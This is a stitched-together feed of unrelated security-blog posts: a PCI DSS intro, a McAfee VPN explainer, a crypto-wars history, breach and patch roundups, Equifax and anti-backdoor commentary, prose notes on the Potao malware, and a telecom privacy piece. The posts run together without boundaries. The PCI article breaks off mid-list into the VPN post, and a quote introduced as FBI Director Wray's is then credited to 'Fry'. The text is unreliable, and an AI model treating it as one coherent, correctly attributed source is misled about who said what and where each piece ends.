This is the third post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS affects small, medium, and large businesses that are going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires). In the previous articles we have written about PCI, we covered requirements 1 and 2:
- Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
At one time Virtual Private Networks (VPNs) used to be tools exclusive to corporations and techie friends who appeared overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.
What’s a VPN?
A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.
For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect — or create a secure tunnel in which that data can travel —while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s data and allow a more secure internet connection. Without a VPN, any online activity — including gaming, social networking, and email — is fair game for hackers since public Wi-Fi lacks encryption.
Why VPNs matter
- Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
- You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
- Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Most everything we do online is being tracked by Internet Service Providers (ISPs). ISPs track us by our individual Internet Protocol (IP) addresses generated by each device that connects to a network. Much like an identification number, each digital device has an IP address which allows it to communicate within the network. A VPN routes your online activity through different IP addresses allowing you remain anonymous. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole — public Wi-Fi!
As you can see VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s a product that is trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.
The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.
The malware attack that began as an installation of malicious Injectbody/Injectscr WordPress plugins back in February has evolved since then.
Some of the changes were documented as updates at the bottom of the original blog post, however, every week we see minor modifications in the way they obfuscate the scripts or the files they inject them into.
Hackers add the malicious code and then obfuscate the entire file contents along with the original legitimate code so that the only way to clean the files without breaking the site functionality is to replace them with their original clean copies.
F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here.
In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.
Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).
People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.
However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.
The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.
In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Sharmir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.
This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.
And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.
This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.
But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.
In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.
However that wasn’t the end of the story. Like in so many cases “justice too long delayed is justice denied”. The internet is becoming systematically protected by encryption in the last two years thanks to the amazing work of LetsEncrypt. However, we have spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack putting many systems at risk even today.
Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.
This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.
The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.
News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.
In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.
“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”
Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that a unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.
Other trending cybercrime events from the week include:
- Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
- Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
- Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
- Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.
In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Fry, that meant the FBI could not access more than half of the devices they tried to access during the period.
“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”
However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.
In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.
Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.
“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”
With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.
Traffic sent to and from major internet sites was briefly rerouted to an ISP in Russia by an unknown party. The likely precursor of an attack, researchers describe the Dec. 13 event as suspicious and intentional.
According to BGPMON, which detected the event, starting at 04:43 (UTC) 80 prefixes normally announced by several organizations were detected in the global BGP routing tables with an Origin AS of 39523 (DV-LINK-AS), out of Russia.
September was an extremely busy month for security updates, with major patches releases by Microsoft, Adobe, Apache, Cisco and Apple to fix an array of serious security vulnerabilities including BlueBorne, a Bluetooth bug which exposes billions of devices to man-in-the-middle attacks.
- Equifax Data Breach: 143 Million Records Stolen, including 400,000 UK Customers
- Deloitte hit by Cyber Attack Revealing clients’ Secret Emails
- Kaspersky software banned from US Government Agencies
- Avast CCleaner used to Spread Backdoor to over Two Million Users
- NSA Cryptography Proposal Rejected by Allies
- Thousands of Amazon AWS Instances Host C&C Servers for POS Malware
- FA increases Cyber Security over World Cup 2018 Hacking Concerns
- Lenovo fined over Superfish Adware-Ridden Laptops
- 20% of Manchester Police computers at Risk of Ransomware - using XP
- BlueBorne: Billions of Bluetooth devices Vulnerable to MITM Attacks
- Apache Struts alters API code, Patch Critical Remote Code Execution Flaw
- Microsoft release Critical Security Updates for IE/Edge, Office, .NET, Skype & Windows
- Adobe Releases Fixes for 43 Critical Security Vulnerabilities in Acrobat and Reader
- Cisco patches remote code execution flaws in IOS and IOS XE
- Bashware Vulnerability could put 400 million Windows systems at Risk
- Joomla 3.8 Patches eight-year-old Credential Stealing Flaw
- Apple Patches a potentially Critical Vulnerability with iOS 11.0.01 Update
- Apple iOS 11 makes it harder for Law Enforcement to Access Data
- Dragonfly APT Group Targeting Power Facilities
- SynAck Ransomware Attacks on the Rise - Active £325k Bitcoin Wallet
- Locky Ransomware back in Huge Spam Campaign; New Variant Escapes Sandbox
- Phishers Target LinkedIn users via Hijacked Accounts
- NIST Guidelines for Ransomware Recovery: Situational Awareness Vital
- Dolphin Attack could allow Hackers to take over AI Voice Assistants
We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.
I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.
Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.
The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.
Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.
100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.
We told you before that’s there is no real debate over encryption. Cyber security experts know that you can’t break it without creating huge security risks and eliminating most forms of secrecy, which is essential for free speech.
That’s what our Erka Koivunen told them members of the United Kingdom’s Parliament debating the draft Investigatory Powers bill also known as the “Snoopers’ Charter” in December.
But do governments even want to hear what the experts — or anyone outside of the intelligence community — has to say about encryption?
In the U.S., influential members of the Senate want to bypass a proposed commission to study encryption and move straight to passing a bill that could break it.
“I don’t think a commission is necessarily the right thing when you know what the problem is. And we know what the problem is,” Senate Intelligence Committee Chairman Richard Burr (R-N.C.) said.
Why? Government’s want the access to encrypted communications and are willing to risk the vulnerabilities this will create for its citizens.
We’re trying to draw attention to this rush to break encryption that’s happening fast, relying on the very understandable fear of terrorism, without the public’s awareness of the potential consequences.
This January 28 is Data Privacy Day. It’s backed by the Cyber Security Alliance, which works with the U.S. Department of Homeland Security along with other private sector partners. We’re hoping to “hack” into attention around the day to make sure governments know that we do care about preserving privacy.
To mark it Erka will be doing an Ask Me Anything session on Reddit at 10 AM EST/ 5 PM EET answering any questions you have about encryption, cyber security and the pressures governments feel around the globe. You can also ask about how to secure yourself to maximize your security and privacy.
Erka has worked with top officials from the European Union and the US and understands the need for security balanced with a respect for privacy. And we’d love to know what questions you have about this issue so we can get answers to as many people as possible before it’s too late.
We hope you’ll join us and help spread the word.
We are in one of those phases again. The Paris attacks caused, once again, a cascade of demands for more surveillance and weakening of encryption. These demands appear every time, regardless of if the terrorists used encryption or not.
The perhaps most controversial demand is to make backdoors mandatory in communication software. Encryption technology can be practically unbreakable if implemented right. And the use of encryption has skyrocketed after the Snowden revelations. But encryption is not only used by terrorists. As a matter of fact, it’s one of the fundaments we are building our information society on. Protection against cybercrime, authentication of users, securing commerce, maintaining business secrets, protecting the lives of political dissidents, etc. etc. These are all critical functions that rely on encryption. So encryption is good, not bad. But as any good thing, it can be both used and misused.
And beside that. As people from the Americas prefer to express it: encryption is speech, referring to the First Amendment that grant people free speech. Both encryption technology and encrypted messages can be seen as information that people are free to exchange. Encryption technology is already out there and widely known. How on earth can anyone think that we could get this genie back in the bottle? Banning strongly encrypted messages would just harm ordinary citizens but not stopping terrorists from using secure communications, as they are known to disregard laws anyway. Banning encryption as an anti-terror measure would work just as well as simply banning terrorism. (* So can the pro-backdoor politicians really be that stupid and ignorant?
Well, that might not be the whole truth. But let’s first take a look at the big picture. What kind of tools do the surveillance agencies have to fight terrorism, or spy on their enemies or allies, or anybody else that happen to be of interest? The methods in their toolboxes can roughly be divided in three sections:
- Tapping the wire. Reading the content of communications this way is becoming futile thanks to extensive use of encryption, but traffic analysis can still reveal who’s communicating with whom. People with unusual traffic patterns may also get attention at this level, despite the encryption.
- Getting data from service provider’s systems. This usually reveals your network of contacts, and also the contents unless the service uses proper end-to-end encryption. This is where they want the backdoors.
- Putting spying tools on the suspects’ devices. This can reveal pretty much everything the suspect is doing. But it’s not a scalable method and they must know whom to target before this method can be used.
And their main objectives:
- Listen in to learn if a suspect really is planning an attack. This require access to message contents. This is where backdoors are supposed to help, according to the official story.
- Mapping contact networks starting from a suspect. This requires metadata from the service providers or traffic analysis on the cable.
- Finding suspects among all network users. This requires traffic analysis on the cable or data mining at the service providers’ end.
So forcing vendors to weaken end-to-end encryption would apparently make it easier to get message contents from the service providers. But as almost everyone understands, a program like this can never be water-tight. Even if the authorities could force companies like Apple, Google and WhatsApp to weaken security, others operating in another jurisdiction will always be able to provide secure solutions. And more skillful gangs could even use their own home-brewed encryption solutions. So what’s the point if we just weaken ordinary citizens’ security and let the criminals keep using strong cryptography? Actually, this is the real goal, even if it isn’t obvious at first.
Separating the interesting targets from the mass is the real goal in this effort. Strong crypto is in itself not the intelligence agencies’ main threat. It’s the trend that makes strong crypto a default in widely used communication apps. This makes it harder to identify the suspects in the first place as they can use the same tools and look no different from ordinary citizens.
Backdoors in the commonly used communication apps would however drive the primary targets towards more secure, or even customized, solutions. These solutions would of course not disappear. But the use of them would not be mainstream, and function as a signal that someone has a need for stronger security. This signal is the main benefit of a mandatory backdoor program.
But it is still not worth it, the price is far too high. Real-world metaphors are often a good way to describe IT issues. Imagine a society where the norm is to leave your home door unlocked. The police is walking around and checking all doors. They may peek inside to check what you are up to. And those with a locked door must have something to hide and are automatically suspects. Does this feel right? Would you like to live in a society like that? This is the IT-society some agencies and politicians want.
(* Yes, demanding backdoors and banning cryptography is not the same thing. But a backdoor is always a deliberate fault that makes an encryption system weaker. So it’s fair to say that demanding backdoors is equal to banning correctly implemented encryption.
It’s a well-known fact that UK’s Prime Minister David Cameron doesn’t care much about peoples’ privacy. Recently he has been driving the so called Snooper’s Charter that would give authorities expanded surveillance powers, which got additional fuel from the Paris attacks.
It is said that terrorists want to tear down the Western society and lifestyle. And Cameron definitively puts himself in the same camp with statements like this:
“In our country, do we want to allow a means of communication between people which we cannot read? No, we must not.”
Note that he didn’t say terrorists, he said people. Kudos for the honesty. It’s a fact that terrorist blend in with the rest of the population and any attempt to weaken their security affects all of us. And it should be a no-brainer that a nation where the government can listen in on everybody is bad, at least if you have read Orwell’s Nineteen Eighty-Four.
But why does WhatsApp occur over and over as an example of something that gives the snoops grey hair? It’s a mainstream instant messenger app that wasn’t built for security. There are also similar apps that focus on security and privacy, like Telegram, Signal and Wickr. Why isn’t Cameron raging about them?
The answer is both simple and very significant. But it may not be obvious at fist. Internet was by default insecure and you had to use tools to fix that. The pre-Snowden era was the golden age for agencies tapping into the Internet backbone. Everything was open and unencrypted, except the really interesting stuff. Encryption itself became a signal that someone was of interest, and the authorities could use other means to find out what that person was up to.
More and more encryption is being built in by default now when we, thanks to Snowden, know the real state of things. A secured connection between client and server is becoming the norm for communication services. And many services are deploying end-to-end encryption. That means that messages are secured and opened by the communicating devices, not by the servers. Stuff stored on the servers are thus also safe from snoops. So yes, people with Cameron’s mindset have a real problem here. Correctly implemented end-to-end encryption can be next to impossible to break.
But there’s still one important thing that tapping the wire can reveal. That’s what communication tool you are using, and this is the important point. WhatsApp is a mainstream messenger with security. Telegram, Signal and Wickr are security messengers used by only a small group people with special needs. Traffic from both WhatsApp and Signal, for example, are encrypted. But the fact that you are using Signal is the important point. You stick out, just like encryption-users before.
WhatsApp is the prime target of Cameron’s wrath mainly because it is showing us how security will be implemented in the future. We are quickly moving towards a net where security is built in. Everyone will get decent security by default and minding your security will not make you a suspect anymore. And that’s great! We all need protection in a world with escalating cyber criminality.
WhatsApp is by no means a perfect security solution. The implementation of end-to-end encryption started in late 2014 and is still far from complete. The handling of metadata about users and communication is not very secure. And there are tricks the wire-snoops can use to map peoples’ network of contacts. So check it out thoroughly before you start using it for really hot stuff. But they seem to be on the path to become something unique. Among the first communication solutions that are easy to use, popular and secure by default.
Apple’s iMessage is another example. So easy that many are using it without knowing it, when they think they are sending SMS-messages. But iMessage’s security is unfortunately not flawless either.
PS. Yes, weakening security IS a bad idea. An excellent example is the TSA luggage locks, that have a master key that *used to be* secret.
Image by Sam Azgor
- Aka Sapotao and node69
- Group - Sandworm / Quedagh APT
- Vectors - USB, exe as doc, xls
- Victims - RU, BY, AM, GE
- Victims - MMM group, UA gov
- truecryptrussia.ru has been serving modified versions of the encryption software (Win32/FakeTC) that included a backdoor to selected targets.
- Win32/FakeTC - data theft from encrypted drives
- The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
- 1st Full Plugin and its export function is called Plug. Full plugins run continuously until the infected system is restarted
- 2nd Light Plugin with an export function Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
- Some of the plugins were signed with a certificate issued to “Grandtorg”:
- Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
- MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
- After receiving the request the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key .
- In 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
- The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key
- The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32bits) and also the name of the current process.
- Potao USB - uses social engineering, exe in the root disguised as drive icon
- Potao Anti RE - uses the MurmurHash2 algorithm for computing the hashes of the API function names.
- Potao Anti RE - encryption of strings
- Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
- IOC https://github.com/eset/malware-ioc/tree/master/potao
With Net Neutrality close to becoming a reality in the United States, Europe’s telecom companies appear ready to fight for consumers’ trust.
At the Mobile World Congress in Barcelona this week, Telefonica CEO Cesar Alierta called for strict rules that will foster “digital confidence”. Vodafone CEO Vittorio Colao’s keynote highlighted the need for both privacy and security. Deutsche Telekom’s Tim Höttges was in agreement, noting that “data privacy is super-critical”.
“80% [of consumers] are concerned about data security and privacy, but they are always clicking ‘I accept [the terms and conditions], I accept, I accept’ without reading them,” said Höttges, echoing a reality we found when conducting an experiment that — in the fine print — asked people to give up their first born child in exchange for free Wi-Fi.
The fight for consumers’ digital freedom is close to our hearts at F-Secure and we agree that strong rules about data breach disclosure are essential to regaining consumers trust. However, we worry that anything that limits freedom in name of privacy must be avoided.
Telenor CEO and GSMA chairman, Fredrik Baksaas noted the very real problem that consumers face managing multiple online identities with multiple passwords. He suggested tying digital identity to SIM cards. This dream of a single identity may seem liberating on a practical level. But beyond recently exposed problems with SIM security, a chained identity could disrupt some of the key benefits of online life — the right to define your identity, the liberty to separate work life from home life, the ability to participate in communities with an alternate persona.
GMSA is behind a single authentication system adopted by more than a dozen operators that is tied to phones, which could simplify life for many users. But it will likely not quench desires to have multiple email accounts or identities on a site nor completely solve the conundrum of digital identity.
The biggest problem is that so many of us aren’t aware of what we’ve already given up.
The old saying goes, “If it’s free, you’re the product”. This was a comfortable model for generations who grew up trading free content in exchange for watching or listening to advertisements. But now the ads are watching us back.
F-Secure Labs has found that more than half of the most popular URLs in the world aren’t accessed directly by users. They’s accessed automatically when you visit the sites we intend to visit and used to track our activity.
Conventional terms and conditions are legal formalities that offer no benefits to users. As our Mikko Hypponen often says, the biggest lie on the Internet is “I have read and agreed with terms and conditions.” This will have to change for any hope of a world where privacy is respected.
In the advanced world, store-bought food is mandated to have its nutritional information printed on the packaging. We don’t typically read — nor understand — all the ingredients. But we get a snapshot of what effect it will have on us physically.
How about something like this for privacy that informs us how data is treated by a particular site or application.
What data is captured?
Is is just on this site or does it follow you around the web?
How long is stored?
Whom is it shared with?
Key questions, simply answered — all with the purpose of making it clear that your privacy has value.
Along with this increased transparency, operators and everyone who cares about digital rights must pay close attention to the effort to ban or limit encryption in the name of public safety. The right of law-abiding citizens to cloak their online activity is central to democracy. And all the privacy innovations in the world won’t matter if we cannot expect that right to exist.
We are entering an era where consumers will have more reasons, need and opportunities to connect than ever before. The services that offer us the chance to be more than a product will be the ones that thrive.